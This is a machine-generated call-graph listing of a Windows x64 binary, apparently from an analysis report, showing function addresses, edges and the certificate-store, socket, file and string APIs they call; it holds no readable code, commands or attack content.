7ff8b7e65be0 93972->93990 93973->93958 93974 7ff8b7e6c2c3 93978 7ff8b7ebfdf5 free 93977->93978 93985 7ff8b7ebfe0d 93977->93985 93978->93985 93980 7ff8b7ebfe89 free 93981 7ff8b7ebfe9f 93980->93981 93982 7ff8b7ebfeba 93981->93982 93983 7ff8b7ebfea8 free 93981->93983 93982->93965 93982->93966 93983->93982 93984 7ff8b7ebfe6b 93984->93980 93984->93981 93985->93984 93986 7ff8b7ebfe43 free 93985->93986 93987 7ff8b7ebfe4d 93985->93987 93986->93987 93988 7ff8b7ebfe62 free 93987->93988 93989 7ff8b7ebfe56 CertCloseStore 93987->93989 93988->93984 93989->93988 93991 7ff8b7e65cc2 93990->93991 93992 7ff8b7e65c02 93990->93992 93991->93974 93992->93991 93993 7ff8b7e74bb0 14 API calls 93992->93993 94009 7ff8b7ec04a6 94010 7ff8b7ec04ae 94009->94010 94011 7ff8b7ebc700 21 API calls 94010->94011 94022 7ff8b7ec04dd 94010->94022 94011->94022 94012 7ff8b7ec0549 94013 7ff8b7ec091b calloc 94012->94013 94014 7ff8b7ec05b2 94012->94014 94026 7ff8b7ec0591 94012->94026 94015 7ff8b7ec0c22 94013->94015 94016 7ff8b7ec093c 94013->94016 94143 7ff8b7e726d0 MultiByteToWideChar malloc MultiByteToWideChar free 94014->94143 94018 7ff8b7ec1069 94015->94018 94023 7ff8b7ebc700 21 API calls 94015->94023 94148 7ff8b7e74a70 14 API calls 94016->94148 94031 7ff8b7ec10b0 94018->94031 94035 7ff8b7e74b60 18 API calls 94018->94035 94048 7ff8b7ec0ef7 94018->94048 94020 7ff8b7ec07c5 94024 7ff8b7ec0975 94020->94024 94030 7ff8b7ec07dc CertOpenStore 94020->94030 94021 7ff8b7ec05b7 94027 7ff8b7ec05c3 wcschr 94021->94027 94095 7ff8b7ec096b 94021->94095 94022->94012 94028 7ff8b7ebc700 21 API calls 94022->94028 94045 7ff8b7ec05a6 94022->94045 94029 7ff8b7ec0c5b 94023->94029 94040 7ff8b7ec09a3 94024->94040 94041 7ff8b7ec0998 free 94024->94041 94025 7ff8b7ec094b 94032 7ff8b7ec0955 CertFreeCertificateContext 94025->94032 94033 7ff8b7ec095b 94025->94033 94026->94020 94038 7ff8b7ec0796 94026->94038 94034 7ff8b7ec05dc wcsncmp 94027->94034 94105 7ff8b7ec0738 94027->94105 94028->94022 94029->94018 94138 7ff8b7ec0c63 94029->94138 94043 7ff8b7ec0804 94030->94043 94044 7ff8b7ec086b free CryptStringToBinaryW 94030->94044 94036 7ff8b7ec10b7 94031->94036 94104 7ff8b7ec10d0 94031->94104 94032->94033 94037 7ff8b7ec0960 CertCloseStore 94033->94037 94033->94095 94039 7ff8b7ec0607 wcsncmp 94034->94039 94100 7ff8b7ec05fc wcschr 94034->94100 94035->94031 94155 7ff8b7e74a70 14 API calls 94036->94155 94037->94095 94145 7ff8b7e74a70 14 API calls 94038->94145 94050 7ff8b7ec0629 wcsncmp 94039->94050 94039->94100 94051 7ff8b7ec09ac fseek 94040->94051 94081 7ff8b7ec0a85 94040->94081 94041->94040 94042 7ff8b7ec9e10 8 API calls 94052 7ff8b7ec1361 94042->94052 94146 7ff8b7e72780 WideCharToMultiByte malloc WideCharToMultiByte free 94043->94146 94054 7ff8b7ec08b1 94044->94054 94055 7ff8b7ec08c8 CertFindCertificateInStore 94044->94055 94159 7ff8b7e74a70 14 API calls 94045->94159 94046 7ff8b7ec1300 94158 7ff8b7e74a70 14 API calls 94046->94158 94086 7ff8b7ec1299 CertFreeCertificateContext 94048->94086 94094 7ff8b7ec129f 94048->94094 94063 7ff8b7ec064b wcsncmp 94050->94063 94050->94100 94064 7ff8b7ec0a1d 94051->94064 94065 7ff8b7ec09cc ftell 94051->94065 94056 7ff8b7ec08ba free 94054->94056 94057 7ff8b7ec0c0d CertCloseStore 94054->94057 94058 7ff8b7ec08f7 free 94055->94058 94059 7ff8b7ec0905 94055->94059 94056->94057 94057->94095 94058->94059 94059->94057 94071 7ff8b7ec090e 94059->94071 94061 7ff8b7ec10eb strtol 94073 7ff8b7ec1101 strchr 94061->94073 94061->94104 94075 7ff8b7ec066a wcsncmp 94063->94075 94063->94100 94076 7ff8b7ec09db 94064->94076 94078 7ff8b7ec0a22 fseek 94064->94078 94065->94064 94065->94076 94066 7ff8b7ec0809 GetLastError 94147 7ff8b7e74a70 14 API calls 94066->94147 94069 7ff8b7ec06fa 94090 7ff8b7ec0716 _wcsdup 94069->94090 94069->94105 94070 7ff8b7ec0ab9 malloc 94082 7ff8b7ec0ad3 94070->94082 94083 7ff8b7ec0b69 94070->94083 94071->94013 94072 7ff8b7ec0765 94072->94046 94085 7ff8b7ec0771 94072->94085 94073->94104 94074 7ff8b7ec07c0 94074->94095 94103 7ff8b7ec0858 free 94074->94103 94087 7ff8b7ec0689 wcsncmp 94075->94087 94075->94100 94098 7ff8b7ec0a4e fclose 94076->94098 94099 7ff8b7ec09ec fread 94076->94099 94078->94076 94089 7ff8b7ec0a3a malloc 94078->94089 94079 7ff8b7ec131b free 94079->94095 94080 7ff8b7ec11d4 strchr 94080->94048 94080->94104 94081->94070 94081->94081 94091 7ff8b7ec0b0a 94082->94091 94092 7ff8b7ec0ad8 MultiByteToWideChar 94082->94092 94096 7ff8b7ec0b77 94083->94096 94097 7ff8b7ec0b6e free 94083->94097 94084 7ff8b7ec0d42 strchr 94084->94138 94085->94026 94086->94094 94087->94100 94101 7ff8b7ec06a8 wcsncmp 94087->94101 94088 7ff8b7ec0838 free 94088->94074 94102 7ff8b7ec0846 free 94088->94102 94089->94076 94090->94030 94090->94105 94121 7ff8b7ebc700 21 API calls 94091->94121 94092->94091 94093 7ff8b7ec0e89 94093->94048 94130 7ff8b7ec0edc 94093->94130 94094->94095 94106 7ff8b7eae4c0 17 API calls 94094->94106 94095->94042 94108 7ff8b7ec0bc2 CertFindCertificateInStore 94096->94108 94109 7ff8b7ec0b80 GetLastError 94096->94109 94097->94096 94112 7ff8b7ec0a57 94098->94112 94099->94098 94110 7ff8b7ec0a06 fclose 94099->94110 94100->94069 94100->94105 94101->94100 94111 7ff8b7ec06c7 wcsncmp 94101->94111 94102->94074 94103->94095 94104->94048 94104->94061 94104->94080 94107 7ff8b7ec118c strncmp 94104->94107 94136 7ff8b7ec1155 strncmp 94104->94136 94105->94046 94144 7ff8b7e72830 8 API calls 94105->94144 94113 7ff8b7ec12b4 94106->94113 94107->94104 94118 7ff8b7ec11a6 strncmp 94107->94118 94108->94071 94117 7ff8b7ec0bf0 GetLastError 94108->94117 94114 7ff8b7ec0b93 94109->94114 94115 7ff8b7ec0ba9 94109->94115 94110->94112 94116 7ff8b7ec0a14 94110->94116 94111->94100 94111->94105 94149 7ff8b7e74a70 14 API calls 94112->94149 94157 7ff8b7e74a70 14 API calls 94113->94157 94150 7ff8b7e74a70 14 API calls 94114->94150 94151 7ff8b7e74a70 14 API calls 94115->94151 94116->94081 94152 7ff8b7e74a70 14 API calls 94117->94152 94118->94104 94127 7ff8b7ec11fd 94118->94127 94120 7ff8b7ec0a72 free 94120->94095 94129 7ff8b7ec0b40 PFXImportCertStore free 94121->94129 94122 7ff8b7ec0d7a strncmp 94122->94138 94156 7ff8b7e74a70 14 API calls 94127->94156 94129->94083 94154 7ff8b7e74a70 14 API calls 94130->94154 94131 7ff8b7ec0da6 strncmp 94131->94138 94132 7ff8b7ec12c8 free 94132->94095 94133 7ff8b7ec0b9f 94133->94095 94135 7ff8b7ec0dd7 strncmp 94135->94138 94136->94104 94138->94048 94138->94084 94138->94093 94138->94122 94138->94131 94138->94135 94139 7ff8b7ec0e0b strncmp 94138->94139 94140 7ff8b7ec0e8b 94138->94140 94142 7ff8b7ec0e3f strncmp 94138->94142 94139->94138 94153 7ff8b7e74a70 14 API calls 94140->94153 94142->94138 94142->94140 94143->94021 94144->94072 94145->94074 94146->94066 94147->94088 94148->94025 94149->94120 94150->94133 94151->94095 94152->94057 94153->94095 94154->94095 94155->94095 94156->94095 94157->94132 94158->94079 94159->94095 94160 7ff8b7e9a4a4 94161 7ff8b7e9a4b9 94160->94161 94162 7ff8b7e9a503 94161->94162 94163 7ff8b7e9a52e 94161->94163 94455 7ff8b7e74a70 14 API calls 94162->94455 94165 7ff8b7e9a583 94163->94165 94179 7ff8b7e9a299 94163->94179 94206 7ff8b7e864e7 94163->94206 94287 7ff8b7e863c0 94163->94287 94374 7ff8b7e864f0 94163->94374 94167 7ff8b7e9a592 94165->94167 94168 7ff8b7e9a68f 94165->94168 94166 7ff8b7e9a512 94169 7ff8b7e998c0 459 API calls 94166->94169 94171 7ff8b7e9a63b 94167->94171 94172 7ff8b7e9a59f 94167->94172 94170 7ff8b7e9a741 94168->94170 94173 7ff8b7e9a6aa 94168->94173 94169->94179 94175 7ff8b7e998c0 459 API calls 94170->94175 94170->94179 94177 7ff8b7e9ef80 2 API calls 94171->94177 94171->94179 94176 7ff8b7e998c0 459 API calls 94172->94176 94172->94179 94457 7ff8b7eb4710 19 API calls 94173->94457 94175->94179 94186 7ff8b7e9a5c8 94176->94186 94177->94179 94178 7ff8b7e9a6bc 94180 7ff8b7e998c0 459 API calls 94178->94180 94181 7ff8b7e6cfb0 10 API calls 94179->94181 94190 7ff8b7e99ee0 94179->94190 94182 7ff8b7e9a6d4 94180->94182 94181->94190 94183 7ff8b7e9a733 free 94182->94183 94184 7ff8b7e9a6de 94182->94184 94183->94179 94188 7ff8b7e9a6f5 94184->94188 94192 7ff8b7e9a6e7 free 94184->94192 94186->94179 94456 7ff8b7e9ba90 free free 94186->94456 94187 7ff8b7e9b0e4 94458 7ff8b7eb3d80 45 API calls 94188->94458 94190->94187 94193 7ff8b7e6cfb0 10 API calls 94190->94193 94195 7ff8b7e99840 20 API calls 94190->94195 94198 7ff8b7e74a70 14 API calls 94190->94198 94199 7ff8b7e9ba90 free free 94190->94199 94201 7ff8b7e6a330 298 API calls 94190->94201 94202 7ff8b7e998c0 459 API calls 94190->94202 94459 7ff8b7e9f410 QueryPerformanceCounter GetTickCount 94190->94459 94460 7ff8b7e97540 18 API calls 94190->94460 94461 7ff8b7e9f2d0 17 API calls 94190->94461 94192->94179 94193->94190 94195->94190 94197 7ff8b7e9a706 free 94197->94179 94198->94190 94199->94190 94201->94190 94202->94190 94207 7ff8b7e86500 94206->94207 94208 7ff8b7e94d90 10 API calls 94207->94208 94209 7ff8b7e8652d 94207->94209 94208->94209 94210 7ff8b7e86584 free 94209->94210 94214 7ff8b7e8659d 94209->94214 94273 7ff8b7e8673d 94209->94273 94212 7ff8b7e8668e free 94210->94212 94211 7ff8b7ec9e10 8 API calls 94213 7ff8b7e86cc4 94211->94213 94220 7ff8b7e866ae 94212->94220 94222 7ff8b7e866db 94212->94222 94213->94165 94216 7ff8b7e86605 94214->94216 94557 7ff8b7e8b280 182 API calls _vfwprintf_l 94214->94557 94227 7ff8b7e8661f free 94216->94227 94558 7ff8b7e8b280 182 API calls _vfwprintf_l 94216->94558 94217 7ff8b7e865f0 94217->94216 94218 7ff8b7e865f6 free 94217->94218 94270 7ff8b7e86ca2 94218->94270 94220->94222 94223 7ff8b7e94d90 10 API calls 94220->94223 94221 7ff8b7e86747 free 94229 7ff8b7e86731 94221->94229 94222->94221 94224 7ff8b7e8670a free 94222->94224 94222->94273 94223->94222 94226 7ff8b7e94d90 10 API calls 94224->94226 94226->94229 94227->94212 94227->94270 94228 7ff8b7e8681f 94462 7ff8b7e897f0 94228->94462 94229->94228 94232 7ff8b7e8679b free 94229->94232 94229->94273 94233 7ff8b7e867bf 94232->94233 94234 7ff8b7e867b7 94232->94234 94236 7ff8b7e94d90 10 API calls 94233->94236 94233->94273 94559 7ff8b7e877b0 strchr strchr strchr 94234->94559 94237 7ff8b7e867fc free 94236->94237 94237->94228 94237->94273 94238 7ff8b7e86835 94239 7ff8b7e8689e free 94238->94239 94240 7ff8b7e868be 94238->94240 94242 7ff8b7e868ca 94238->94242 94238->94270 94241 7ff8b7e94d90 10 API calls 94239->94241 94240->94273 94477 7ff8b7e77c20 94240->94477 94241->94240 94242->94240 94244 7ff8b7e868fd free 94242->94244 94245 7ff8b7e86917 94244->94245 94246 7ff8b7e86924 94244->94246 94252 7ff8b7e94d90 10 API calls 94245->94252 94246->94245 94250 7ff8b7e86930 94246->94250 94247 7ff8b7e86c99 94564 7ff8b7e77c70 free 94247->94564 94253 7ff8b7e94d90 10 API calls 94250->94253 94252->94240 94253->94240 94254 7ff8b7e86a06 94254->94247 94255 7ff8b7e94d90 10 API calls 94254->94255 94259 7ff8b7e86a68 94254->94259 94256 7ff8b7e86a4c 94255->94256 94257 7ff8b7e86a55 94256->94257 94256->94259 94560 7ff8b7e77c70 free 94257->94560 94260 7ff8b7e77c20 9 API calls 94259->94260 94261 7ff8b7e86be1 free free free 94260->94261 94261->94247 94262 7ff8b7e86c1c 94261->94262 94263 7ff8b7e86c4e 94262->94263 94265 7ff8b7e86c3e 94262->94265 94501 7ff8b7e87df0 94263->94501 94561 7ff8b7e77c70 free 94265->94561 94266 7ff8b7e86c5d 94268 7ff8b7e86e06 94266->94268 94286 7ff8b7e86dbe SimpleString::operator= 94266->94286 94562 7ff8b7e9c720 _gmtime64 94266->94562 94567 7ff8b7e77c70 free 94268->94567 94270->94273 94565 7ff8b7e74a70 14 API calls 94270->94565 94273->94211 94274 7ff8b7e86c84 94276 7ff8b7e86cdf 94274->94276 94277 7ff8b7e86c8a 94274->94277 94281 7ff8b7e86cf5 94276->94281 94284 7ff8b7e86d05 94276->94284 94563 7ff8b7e74a70 14 API calls 94277->94563 94284->94286 94286->94268 94517 7ff8b7e870e0 94286->94517 94288 7ff8b7e86412 94287->94288 94289 7ff8b7e833d0 8 API calls 94288->94289 94360 7ff8b7e86429 94288->94360 94290 7ff8b7e86438 94289->94290 94357 7ff8b7e86ca2 94290->94357 94630 7ff8b7e88bc0 94290->94630 94293 7ff8b7ec9e10 8 API calls 94294 7ff8b7e86cc4 94293->94294 94294->94165 94295 7ff8b7e8644d 94296 7ff8b7e86471 free 94295->94296 94298 7ff8b7e86485 94295->94298 94295->94357 94296->94298 94297 7ff8b7e94d90 10 API calls 94299 7ff8b7e8652d 94297->94299 94298->94297 94298->94299 94300 7ff8b7e86584 free 94299->94300 94302 7ff8b7e8659d 94299->94302 94299->94360 94301 7ff8b7e8668e free 94300->94301 94308 7ff8b7e866ae 94301->94308 94310 7ff8b7e866db 94301->94310 94304 7ff8b7e86605 94302->94304 94653 7ff8b7e8b280 182 API calls _vfwprintf_l 94302->94653 94314 7ff8b7e8661f free 94304->94314 94654 7ff8b7e8b280 182 API calls _vfwprintf_l 94304->94654 94305 7ff8b7e865f0 94305->94304 94306 7ff8b7e865f6 free 94305->94306 94306->94357 94308->94310 94311 7ff8b7e94d90 10 API calls 94308->94311 94309 7ff8b7e86747 free 94316 7ff8b7e86731 94309->94316 94310->94309 94312 7ff8b7e8670a free 94310->94312 94310->94360 94311->94310 94313 7ff8b7e94d90 10 API calls 94312->94313 94313->94316 94314->94301 94314->94357 94315 7ff8b7e8681f 94318 7ff8b7e897f0 85 API calls 94315->94318 94316->94315 94319 7ff8b7e8679b free 94316->94319 94316->94360 94324 7ff8b7e86835 94318->94324 94320 7ff8b7e867bf 94319->94320 94321 7ff8b7e867b7 94319->94321 94323 7ff8b7e94d90 10 API calls 94320->94323 94320->94360 94655 7ff8b7e877b0 strchr strchr strchr 94321->94655 94325 7ff8b7e867fc free 94323->94325 94326 7ff8b7e8689e free 94324->94326 94328 7ff8b7e868ca 94324->94328 94340 7ff8b7e868be 94324->94340 94324->94357 94325->94315 94325->94360 94327 7ff8b7e94d90 10 API calls 94326->94327 94327->94340 94331 7ff8b7e868fd free 94328->94331 94328->94340 94329 7ff8b7e77c20 9 API calls 94330 7ff8b7e869ed 94329->94330 94334 7ff8b7e86c99 94330->94334 94337 7ff8b7e899c0 34 API calls 94330->94337 94332 7ff8b7e86917 94331->94332 94333 7ff8b7e86924 94331->94333 94338 7ff8b7e94d90 10 API calls 94332->94338 94333->94332 94336 7ff8b7e86930 94333->94336 94660 7ff8b7e77c70 free 94334->94660 94339 7ff8b7e94d90 10 API calls 94336->94339 94341 7ff8b7e86a06 94337->94341 94338->94340 94339->94340 94340->94329 94340->94360 94341->94334 94342 7ff8b7e94d90 10 API calls 94341->94342 94346 7ff8b7e86a68 94341->94346 94343 7ff8b7e86a4c 94342->94343 94344 7ff8b7e86a55 94343->94344 94343->94346 94656 7ff8b7e77c70 free 94344->94656 94347 7ff8b7e77c20 9 API calls 94346->94347 94348 7ff8b7e86be1 free free free 94347->94348 94348->94334 94349 7ff8b7e86c1c 94348->94349 94350 7ff8b7e86c4e 94349->94350 94352 7ff8b7e86c3e 94349->94352 94351 7ff8b7e87df0 65 API calls 94350->94351 94353 7ff8b7e86c5d 94351->94353 94657 7ff8b7e77c70 free 94352->94657 94355 7ff8b7e86e06 94353->94355 94373 7ff8b7e86dbe SimpleString::operator= 94353->94373 94658 7ff8b7e9c720 _gmtime64 94353->94658 94663 7ff8b7e77c70 free 94355->94663 94357->94360 94661 7ff8b7e74a70 14 API calls 94357->94661 94359 7ff8b7e870e0 13 API calls 94362 7ff8b7e86ddf 94359->94362 94360->94293 94361 7ff8b7e86c84 94363 7ff8b7e86cdf 94361->94363 94364 7ff8b7e86c8a 94361->94364 94362->94355 94366 7ff8b7e89390 30 API calls 94362->94366 94368 7ff8b7e86cf5 94363->94368 94371 7ff8b7e86d05 94363->94371 94659 7ff8b7e74a70 14 API calls 94364->94659 94367 7ff8b7e86df4 94366->94367 94367->94355 94662 7ff8b7e77c70 free 94368->94662 94372 7ff8b7e94eb0 8 API calls 94371->94372 94371->94373 94372->94373 94373->94355 94373->94359 94375 7ff8b7e86500 94374->94375 94376 7ff8b7e94d90 10 API calls 94375->94376 94377 7ff8b7e8652d 94375->94377 94376->94377 94378 7ff8b7e86584 free 94377->94378 94382 7ff8b7e8659d 94377->94382 94441 7ff8b7e8673d 94377->94441 94380 7ff8b7e8668e free 94378->94380 94379 7ff8b7ec9e10 8 API calls 94381 7ff8b7e86cc4 94379->94381 94388 7ff8b7e866ae 94380->94388 94390 7ff8b7e866db 94380->94390 94381->94165 94384 7ff8b7e86605 94382->94384 94665 7ff8b7e8b280 182 API calls _vfwprintf_l 94382->94665 94395 7ff8b7e8661f free 94384->94395 94666 7ff8b7e8b280 182 API calls _vfwprintf_l 94384->94666 94385 7ff8b7e865f0 94385->94384 94386 7ff8b7e865f6 free 94385->94386 94438 7ff8b7e86ca2 94386->94438 94388->94390 94391 7ff8b7e94d90 10 API calls 94388->94391 94389 7ff8b7e86747 free 94397 7ff8b7e86731 94389->94397 94390->94389 94392 7ff8b7e8670a free 94390->94392 94390->94441 94391->94390 94394 7ff8b7e94d90 10 API calls 94392->94394 94394->94397 94395->94380 94395->94438 94396 7ff8b7e8681f 94399 7ff8b7e897f0 85 API calls 94396->94399 94397->94396 94400 7ff8b7e8679b free 94397->94400 94397->94441 94406 7ff8b7e86835 94399->94406 94401 7ff8b7e867bf 94400->94401 94402 7ff8b7e867b7 94400->94402 94404 7ff8b7e94d90 10 API calls 94401->94404 94401->94441 94667 7ff8b7e877b0 strchr strchr strchr 94402->94667 94405 7ff8b7e867fc free 94404->94405 94405->94396 94405->94441 94407 7ff8b7e8689e free 94406->94407 94409 7ff8b7e868ca 94406->94409 94410 7ff8b7e868be 94406->94410 94406->94438 94408 7ff8b7e94d90 10 API calls 94407->94408 94408->94410 94409->94410 94413 7ff8b7e868fd free 94409->94413 94411 7ff8b7e77c20 9 API calls 94410->94411 94410->94441 94412 7ff8b7e869ed 94411->94412 94416 7ff8b7e86c99 94412->94416 94419 7ff8b7e899c0 34 API calls 94412->94419 94414 7ff8b7e86917 94413->94414 94415 7ff8b7e86924 94413->94415 94420 7ff8b7e94d90 10 API calls 94414->94420 94415->94414 94418 7ff8b7e86930 94415->94418 94672 7ff8b7e77c70 free 94416->94672 94422 7ff8b7e94d90 10 API calls 94418->94422 94421 7ff8b7e86a06 94419->94421 94420->94410 94421->94416 94423 7ff8b7e94d90 10 API calls 94421->94423 94427 7ff8b7e86a68 94421->94427 94422->94410 94424 7ff8b7e86a4c 94423->94424 94425 7ff8b7e86a55 94424->94425 94424->94427 94668 7ff8b7e77c70 free 94425->94668 94428 7ff8b7e77c20 9 API calls 94427->94428 94429 7ff8b7e86be1 free free free 94428->94429 94429->94416 94430 7ff8b7e86c1c 94429->94430 94431 7ff8b7e86c4e 94430->94431 94433 7ff8b7e86c3e 94430->94433 94432 7ff8b7e87df0 65 API calls 94431->94432 94434 7ff8b7e86c5d 94432->94434 94669 7ff8b7e77c70 free 94433->94669 94436 7ff8b7e86e06 94434->94436 94454 7ff8b7e86dbe SimpleString::operator= 94434->94454 94670 7ff8b7e9c720 _gmtime64 94434->94670 94675 7ff8b7e77c70 free 94436->94675 94438->94441 94673 7ff8b7e74a70 14 API calls 94438->94673 94440 7ff8b7e870e0 13 API calls 94443 7ff8b7e86ddf 94440->94443 94441->94379 94442 7ff8b7e86c84 94444 7ff8b7e86cdf 94442->94444 94445 7ff8b7e86c8a 94442->94445 94443->94436 94447 7ff8b7e89390 30 API calls 94443->94447 94449 7ff8b7e86cf5 94444->94449 94452 7ff8b7e86d05 94444->94452 94671 7ff8b7e74a70 14 API calls 94445->94671 94448 7ff8b7e86df4 94447->94448 94448->94436 94450 7ff8b7ea0280 35 API calls 94448->94450 94674 7ff8b7e77c70 free 94449->94674 94450->94436 94453 7ff8b7e94eb0 8 API calls 94452->94453 94452->94454 94453->94454 94454->94436 94454->94440 94455->94166 94456->94179 94457->94178 94458->94197 94459->94190 94460->94190 94461->94190 94568 7ff8b7e8b6a0 85 API calls 94462->94568 94464 7ff8b7e89830 94466 7ff8b7e89859 94464->94466 94474 7ff8b7e89932 94464->94474 94465 7ff8b7e8980c 94465->94464 94468 7ff8b7e898d8 94465->94468 94475 7ff8b7e89919 94465->94475 94569 7ff8b7e876d0 strchr strchr strchr 94466->94569 94570 7ff8b7e74a70 14 API calls 94468->94570 94470 7ff8b7e898ee 94470->94238 94471 7ff8b7e8987e 94471->94475 94476 7ff8b7e74b60 18 API calls 94471->94476 94473 7ff8b7e899a9 94473->94238 94474->94475 94571 7ff8b7e74a70 14 API calls 94474->94571 94475->94238 94476->94475 94572 7ff8b7e94cc0 9 API calls 94477->94572 94479 7ff8b7e77c3d 94479->94247 94480 7ff8b7e899c0 94479->94480 94481 7ff8b7e89a10 94480->94481 94483 7ff8b7e89bb1 SimpleString::operator= 94480->94483 94482 7ff8b7e89a1d 94481->94482 94481->94483 94573 7ff8b7eb9e10 22 API calls 94482->94573 94485 7ff8b7e89bd9 94483->94485 94487 7ff8b7e77c20 9 API calls 94483->94487 94485->94254 94486 7ff8b7e89b9a 94486->94485 94487->94485 94488 7ff8b7e89ba2 94576 7ff8b7eb9de0 11 API calls 94488->94576 94490 7ff8b7e89a29 94490->94486 94490->94488 94574 7ff8b7eb9f80 8 API calls 94490->94574 94492 7ff8b7e89ad4 94492->94488 94493 7ff8b7e89adc 94492->94493 94575 7ff8b7eb9de0 11 API calls 94493->94575 94495 7ff8b7e89ae4 SimpleString::operator= 94496 7ff8b7e89aff free 94495->94496 94496->94485 94497 7ff8b7e89b14 94496->94497 94497->94485 94498 7ff8b7e89b3b strstr 94497->94498 94499 7ff8b7e89b4f 94498->94499 94499->94485 94500 7ff8b7e77c20 9 API calls 94499->94500 94500->94486 94503 7ff8b7e87e21 94501->94503 94502 7ff8b7e88055 94502->94266 94504 7ff8b7e87e54 94503->94504 94505 7ff8b7e87eda 94503->94505 94507 7ff8b7e87ea6 strcmp 94503->94507 94504->94502 94506 7ff8b7e77c20 9 API calls 94504->94506 94577 7ff8b7e701c0 57 API calls 94505->94577 94506->94502 94507->94505 94509 7ff8b7e87eb9 94507->94509 94509->94505 94510 7ff8b7e87fff 94510->94504 94511 7ff8b7e87ff2 94578 7ff8b7e70150 6 API calls 94511->94578 94513 7ff8b7e8809f 94516 7ff8b7e74b60 18 API calls 94513->94516 94514 7ff8b7e87f0b 94514->94510 94514->94511 94514->94513 94515 7ff8b7e77c20 9 API calls 94514->94515 94515->94514 94516->94511 94525 7ff8b7e8710c 94517->94525 94518 7ff8b7e86ddf 94518->94268 94519 7ff8b7e87190 strchr 94519->94525 94525->94518 94525->94519 94557->94217 94558->94227 94559->94233 94560->94273 94561->94273 94562->94274 94563->94247 94564->94270 94565->94273 94567->94270 94568->94465 94569->94471 94570->94470 94571->94473 94572->94479 94573->94490 94574->94492 94575->94495 94576->94486 94577->94514 94578->94510 94631 7ff8b7e88c12 free 94630->94631 94632 7ff8b7e88beb free _strdup 94630->94632 94634 7ff8b7e88c69 94631->94634 94632->94631 94651 7ff8b7e88d4d 94632->94651 94641 7ff8b7e88c99 94634->94641 94642 7ff8b7e88ccd 94634->94642 94636 7ff8b7e88d15 94639 7ff8b7e94d90 10 API calls 94636->94639 94637 7ff8b7e88de5 94640 7ff8b7e94d90 10 API calls 94637->94640 94638 7ff8b7e88ca8 94643 7ff8b7e88d52 94638->94643 94644 7ff8b7e88cbf free 94638->94644 94638->94651 94639->94651 94640->94651 94664 7ff8b7e877b0 strchr strchr strchr 94641->94664 94642->94636 94642->94637 94645 7ff8b7e88d7f 94643->94645 94649 7ff8b7e88d69 memmove 94643->94649 94650 7ff8b7e88daf 94644->94650 94646 7ff8b7e88d84 strchr 94645->94646 94647 7ff8b7e88d91 94646->94647 94648 7ff8b7e88d94 free 94646->94648 94647->94648 94648->94650 94649->94646 94650->94651 94652 7ff8b7e94d90 10 API calls 94650->94652 94651->94295 94652->94651 94653->94305 94654->94314 94655->94320 94656->94360 94657->94360 94658->94361 94659->94334 94660->94357 94661->94360 94662->94360 94663->94357 94664->94638 94665->94385 94666->94395 94667->94401 94668->94441 94669->94441 94670->94442 94671->94416 94672->94438 94673->94441 94674->94441 94675->94438 94676 7ff8b7e9ad9b 94677 7ff8b7e9ada3 94676->94677 94679 7ff8b7e9adb1 94676->94679 94678 7ff8b7e998c0 459 API calls 94677->94678 94678->94679 94680 7ff8b7e9adce 94679->94680 94684 7ff8b7e9ae06 94679->94684 94696 7ff8b7e9ba90 free free 94679->94696 94683 7ff8b7e6cfb0 10 API calls 94680->94683 94691 7ff8b7e99ee0 94680->94691 94683->94691 94684->94680 94697 7ff8b7e97540 18 API calls 94684->94697 94686 7ff8b7e6cfb0 10 API calls 94686->94691 94688 7ff8b7e9b0e4 94689 7ff8b7e99840 20 API calls 94689->94691 94690 7ff8b7e74a70 14 API calls 94690->94691 94691->94686 94691->94688 94691->94689 94691->94690 94693 7ff8b7e9ba90 free free 94691->94693 94694 7ff8b7e6a330 298 API calls 94691->94694 94695 7ff8b7e998c0 459 API calls 94691->94695 94698 7ff8b7e9f410 QueryPerformanceCounter GetTickCount 94691->94698 94699 7ff8b7e97540 18 API calls 94691->94699 94700 7ff8b7e9f2d0 17 API calls 94691->94700 94693->94691 94694->94691 94695->94691 94696->94684 94697->94680 94698->94691 94699->94691 94700->94691 94701 7ff8b7e664a0 recv 94702 7ff8b7e66504 WSAGetLastError 94701->94702 94703 7ff8b7e66576 94701->94703 94704 7ff8b7e6653e 94702->94704 94705 7ff8b7e66513 94702->94705 94706 7ff8b7e74bb0 14 API calls 94703->94706 94716 7ff8b7eaec40 21 API calls 94704->94716 94709 7ff8b7e74bb0 14 API calls 94705->94709 94708 7ff8b7e66596 94706->94708 94711 7ff8b7e66539 94708->94711 94714 7ff8b7eb3b60 2 API calls 94708->94714 94709->94711 94710 7ff8b7e66550 94717 7ff8b7e74a70 14 API calls 94710->94717 94712 7ff8b7ec9e10 8 API calls 94711->94712 94715 7ff8b7e665d2 94712->94715 94714->94711 94716->94710 94717->94705 94718 7ff8b7e65ea0 94719 7ff8b7e65ede 94718->94719 94737 7ff8b7e65ee3 94718->94737 94720 7ff8b7e66062 94719->94720 94719->94737 94758 7ff8b7e679f0 94719->94758 94723 7ff8b7ea2690 19 API calls 94720->94723 94722 7ff8b7ec9e10 8 API calls 94725 7ff8b7e6613c 94722->94725 94726 7ff8b7e6607b 94723->94726 94728 7ff8b7e66098 94726->94728 94729 7ff8b7e66081 94726->94729 94727 7ff8b7e65fa9 94731 7ff8b7e6602d 94727->94731 94733 7ff8b7e67f90 34 API calls 94727->94733 94727->94737 94730 7ff8b7e660d0 94728->94730 94734 7ff8b7e660aa 94728->94734 94732 7ff8b7e74bb0 14 API calls 94729->94732 94839 7ff8b7e682d0 SleepEx getsockopt 94730->94839 94731->94737 94741 7ff8b7e68110 2 API calls 94731->94741 94732->94737 94739 7ff8b7e65fc7 WSASetLastError 94733->94739 94734->94727 94744 7ff8b7e682d0 3 API calls 94734->94744 94735 7ff8b7e65f4e WSAGetLastError 94822 7ff8b7e67f90 94735->94822 94736 7ff8b7e65f36 connect 94736->94735 94737->94722 94843 7ff8b7eaec40 21 API calls 94739->94843 94741->94737 94744->94727 94746 7ff8b7e660eb 94749 7ff8b7eb3b60 2 API calls 94746->94749 94747 7ff8b7e65ff5 94750 7ff8b7e74b60 18 API calls 94747->94750 94748 7ff8b7e74bb0 14 API calls 94751 7ff8b7e65f85 94748->94751 94752 7ff8b7e660f5 94749->94752 94750->94731 94751->94720 94753 7ff8b7e65f97 94751->94753 94754 7ff8b7e67f90 34 API calls 94752->94754 94842 7ff8b7e681a0 31 API calls 94753->94842 94756 7ff8b7e6610a 94754->94756 94757 7ff8b7e74bb0 14 API calls 94756->94757 94757->94737 94759 7ff8b7eb3b60 2 API calls 94758->94759 94760 7ff8b7e67a2e 94759->94760 94844 7ff8b7e68230 94760->94844 94762 7ff8b7e67a4f 94779 7ff8b7e67ac1 94762->94779 94847 